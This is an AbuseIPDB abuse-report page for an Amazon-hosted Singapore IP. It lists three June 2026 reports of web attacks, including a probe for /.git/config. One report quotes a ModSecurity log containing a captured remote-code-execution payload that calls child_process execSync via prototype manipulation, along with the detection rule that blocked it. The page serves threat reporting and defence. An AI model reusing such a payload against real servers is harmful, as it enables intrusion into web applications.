JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 54.255.170.116

54.255.170.116 was found in our database!

This IP was reported 3 times. Confidence of Abuse is 16%: ?

16%

ISP	Amazon Data Services Japan
Usage Type	Data Center/Web Hosting/Transit
ASN	AS16509
Hostname(s)	ec2-54-255-170-116.ap-southeast-1.compute.amazonaws.com
Domain Name	amazon.com
Country	🇸🇬 Singapore
City	Singapore

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 54.255.170.116

Whois 54.255.170.116

IP Abuse Reports for 54.255.170.116:

This IP address has been reported a total of 3 times from 3 distinct sources. 54.255.170.116 was first reported on June 6th 2026, and the most recent report was 3 weeks ago.

Old Reports: The most recent abuse report for this IP address is from 3 weeks ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 mnsf	2026-06-06 11:08:51 (3 weeks ago)	Abuse Detected (10)	Brute-Force Web App Attack
🇩🇪 Hary74656	2026-06-06 10:42:26 (3 weeks ago)	[Sat Jun 06 12:42:17.492712 2026] [security2:error] [pid 300923:tid 301098] [client 54.255.170.116:3 ... show more [Sat Jun 06 12:42:17.492712 2026] [security2:error] [pid 300923:tid 301098] [client 54.255.170.116:32998] [client 54.255.170.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\$(?:\\\$(?:\\\\(.\\\$\|.)\\\\)\|\\\\{.\\\\})\|[<>]\\\$.\\\$)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "367"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41271)) found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo $((41271)) \| base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "a ... show less	Web App Attack
🇺🇸 TPI-Abuse	2026-06-06 09:48:42 (3 weeks ago)	(mod_security) mod_security (id:210492) triggered by 54.255.170.116 (ec2-54-255-170-116.ap-southeast ... show more (mod_security) mod_security (id:210492) triggered by 54.255.170.116 (ec2-54-255-170-116.ap-southeast-1.compute.amazonaws.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jun 06 05:48:36.010493 2026] [security2:error] [pid 480:tid 480] [client 54.255.170.116:58740] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "120"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "26c.org"] [uri "/.git/config"] [unique_id "aiPs9FzaKWZ3m1QEMB0GBQAAAAA"] show less	Brute-Force Bad Web Bot Web App Attack

Showing 1 to 3 of 3 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇹🇼 198.235.24.95

🇵🇱 95.214.53.157

🇺🇸 20.168.0.87

🇺🇸 198.46.211.159

🇸🇪 185.246.128.133

🇨🇳 180.111.30.184

🇺🇸 174.173.71.160

🇺🇸 148.153.188.246

🇹🇼 122.117.201.28

🇹🇼 110.25.112.152

🇳🇱 89.248.167.131

🇨🇳 58.59.233.161

🇳🇱 45.156.128.148

🇳🇱 45.148.10.34

🇺🇸 205.210.31.85

🇨🇱 186.79.20.24

🇨🇭 164.128.161.28

🇮🇳 117.244.66.131

🇨🇳 112.36.196.130

🇺🇸 69.164.215.249